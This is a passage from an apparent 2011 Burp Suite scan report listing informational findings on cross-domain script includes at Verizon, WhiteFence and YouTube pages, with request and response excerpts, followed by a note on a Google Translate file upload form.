The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/dwr/dwrUtil.js
http://cache.vzw.com/dwr/interface/Timer.js
http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/store/&hec=2&cv.c13=session+alert+active&hid=0.4740242080297321 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ZIPCODE=10010; CITY=New York; STATE=NY; mbox=session#1315278939788-568601#1315281120|PC#1315278939788-568601.19#1316488860|check#true#1315279320; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 15971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>

<script type='text/javascript' src='http://cache.vzw.com/dwr/interface/Timer.js'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.73. http://www.verizonwireless.com/b2c/store/accessory previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/accessory

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/dwr/dwrUtil.js
http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/home.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/store/accessory HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 50969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

                       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/home.js"></script>
...[SNIP]...
</script>
   <script type='text/javascript' src='http://cache.vzw.com/dwr/dwrUtil.js'></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.74. http://www.verizonwireless.com/b2c/store/controller previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/store/controller

Issue detail

The response dynamically includes the following scripts from other domains:

https://scache.vzw.com/globalnav/globalnav.js?v=11-09
https://scache.vzw.com/js/shared/hbx/hbx.js
https://scache.vzw.com/js/shared/hbx/hbxFunctions.js
https://scache.vzw.com/js/shared/hbx/hbxVariables.js
https://scache.vzw.com/onlineopinionV5/oo_conf.js
https://scache.vzw.com/onlineopinionV5/oo_engine.min.js
https://scache.vzw.com/scripts/accessible/customnote.js
https://scache.vzw.com/scripts/accessible/layers.js
https://scache.vzw.com/scripts/accessible/lib.js
https://scache.vzw.com/scripts/accessible/library.js?v=11-09
https://scache.vzw.com/scripts/accessible/mootools131.js
https://scache.vzw.com/scripts/accessible/mootools131more.js
https://scache.vzw.com/scripts/homepage/swfobject.js
https://scache.vzw.com/scripts/liveperson/mtagconfig.js
https://scache.vzw.com/scripts/offermatica/mbox.js
https://scache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

16.75. http://www.verizonwireless.com/b2c/vzwfly previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/vzwfly

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.vzw.com/globalnav/globalnav.js?v=11-09
http://cache.vzw.com/js/shared/hbx/hbx.js
http://cache.vzw.com/js/shared/hbx/hbxFunctions.js
http://cache.vzw.com/js/shared/hbx/hbxVariables.js
http://cache.vzw.com/onlineopinionV5/oo_conf.js
http://cache.vzw.com/onlineopinionV5/oo_engine.min.js
http://cache.vzw.com/scripts/accessible/customnote.js
http://cache.vzw.com/scripts/accessible/layers.js
http://cache.vzw.com/scripts/accessible/lib.js
http://cache.vzw.com/scripts/accessible/library.js?v=11-09
http://cache.vzw.com/scripts/accessible/mootools131.js
http://cache.vzw.com/scripts/accessible/mootools131more.js
http://cache.vzw.com/scripts/homepage/swfobject.js
http://cache.vzw.com/scripts/homepage/vzwCarousel.js
http://cache.vzw.com/scripts/liveperson/mtagconfig.js
http://cache.vzw.com/scripts/offermatica/mbox.js
http://cache.vzw.com/scripts/vzw_jquery.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:37:07 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 32537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>


   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>


       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
</noscript>


       <script src="http://cache.vzw.com/scripts/homepage/vzwCarousel.js" type="text/javascript"></script>
...[SNIP]...

16.76. https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.whitefence.com
Path:	/WebObjects/WhiteFence.woa/wa/login

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js
https://whitefence.postclickmarketing.com/Outside/liveball.js

Request

GET /WebObjects/WhiteFence.woa/wa/login HTTP/1.1
Host: www.whitefence.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Mon, 05 Sep 2011 22:37:08 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:37:08 GMT
content-length: 8417
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.whitefence.com
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
   <HEAD>
       <META name="generator" CONTENT="WebObjects 4.5">


   <LINK REL="StyleSheet" TYPE="text/css" MEDIA="screen, print" HREF="https://www.
...[SNIP]...
</TITLE>
            <SCRIPT language=JavaScript src="https://ajax.googleapis.com/ajax/libs/mootools/1.2.4/mootools-yui-compressed.js" type="text/javascript" charset="utf-8"></SCRIPT>
...[SNIP]...


<script type="text/javascript" src="//whitefence.postclickmarketing.com/Outside/liveball.js"></script>
...[SNIP]...

16.77. https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.whitefence.com
Path:	/WebObjects/WhiteFenceService.woa/wa/forgotPassword

Issue detail

The response dynamically includes the following script from another domain:

https://whitefence.postclickmarketing.com/Outside/liveball.js

Request

GET /WebObjects/WhiteFenceService.woa/wa/forgotPassword HTTP/1.1
Host: www.whitefence.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Mon, 05 Sep 2011 22:37:08 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:37:08 GMT
set-cookie: cmIdentifier=1; version="1"; expires=Mon, 12-Sep-2011 22:37:08 GMT; path=/; domain=.whitefence.com
content-length: 6130
Content-Type: text/html; charset=UTF-8
X-Cache: MISS from www.whitefence.com
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
   <HEAD>


   <LINK REL="StyleSheet" TYPE="text/css" MEDIA="screen, print" HREF="https://www.whitefence.com/qstyles/1000001.css">

       <TITLE>Cust
...[SNIP]...


<script type="text/javascript" src="//whitefence.postclickmarketing.com/Outside/liveball.js"></script>
...[SNIP]...

16.78. http://www.youtube.com/results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/results

Issue detail

The response dynamically includes the following script from another domain:

http://s.ytimg.com/yt/jsbin/www-core-vflatRxZ9.js

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.79. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The response dynamically includes the following script from another domain:

https://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 286072
Expires: Mon, 05 Sep 2011 22:37:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:17 GMT
Connection: close
Set-Cookie: BTagRequired=; expires=Sat, 05-Sep-1981 22:37:17 GMT; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<meta name="keywords" content="high, speed, internet, plan, service, deal, package, dsl, verizon">

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

16.80. http://www22.verizon.com/jobs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/jobs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /jobs/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
X-dynaTrace-JS-Agent: true
ETag: ":dtagent326GVC7"
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:18:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:18:42 GMT
Content-Length: 44866
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script type="text/javascript" src="/jobs/dtagent_326.js" data-dtconfig="rid=RID_1903
...[SNIP]...
</a>
<script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4d681e727726c1b0" type="text/javascript"></script>
...[SNIP]...
<div class="footerIcons">
<script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...

16.81. http://www22.verizon.com/jobs/search-jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/jobs/search-jobs

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /jobs/search-jobs HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
X-dynaTrace-JS-Agent: true
ETag: ":dtagent326GVC7"
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:37:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39080

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script type="text/javascript" src="/jobs/dtagent_326.js" data-dtconfig="rid=RID_-121
...[SNIP]...
</a>
<script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4d681e727726c1b0" type="text/javascript"></script>
...[SNIP]...
<div class="footerIcons">
<script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...

16.82. http://www22.verizon.com/jobs/verizon-wireless/search-jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/jobs/verizon-wireless/search-jobs

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

GET /jobs/verizon-wireless/search-jobs HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtSa=-; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.1.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_; dtLatC=141|127|1|297

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
X-dynaTrace-JS-Agent: true
ETag: ":dtagent326GVC7"
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:19:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:19:01 GMT
Content-Length: 191968
Connection: close
Set-Cookie: companytype=vzw; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><script type="text/javascript" src="/jobs/dtagent_326.js" data-dtconfig="rid=RID_-227
...[SNIP]...
</a>
<script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=xa-4d681e727726c1b0" type="text/javascript"></script>
...[SNIP]...
<div class="footerIcons">
<script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&size=S&use_flash=NO&use_transparent=NO&lang=en" type="text/javascript"></script>
...[SNIP]...

16.83. http://www22.verizon.com/residential/fiostv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiostv

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js
https://s7.addthis.com/js/250/addthis_widget.js

Request

Response

16.84. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://s7.addthis.com/js/250/addthis_widget.js

Request

Response

16.85. https://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The response dynamically includes the following script from another domain:

https://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 287614
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close
Set-Cookie: BTagRequired=; expires=Sat, 05-Sep-1981 22:38:00 GMT; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<meta name="keywords" content="high, speed, internet, plan, service, deal, package, dsl, verizon">

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

17. File upload functionality previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.google.com
Path:	/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://translate.google.com/

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

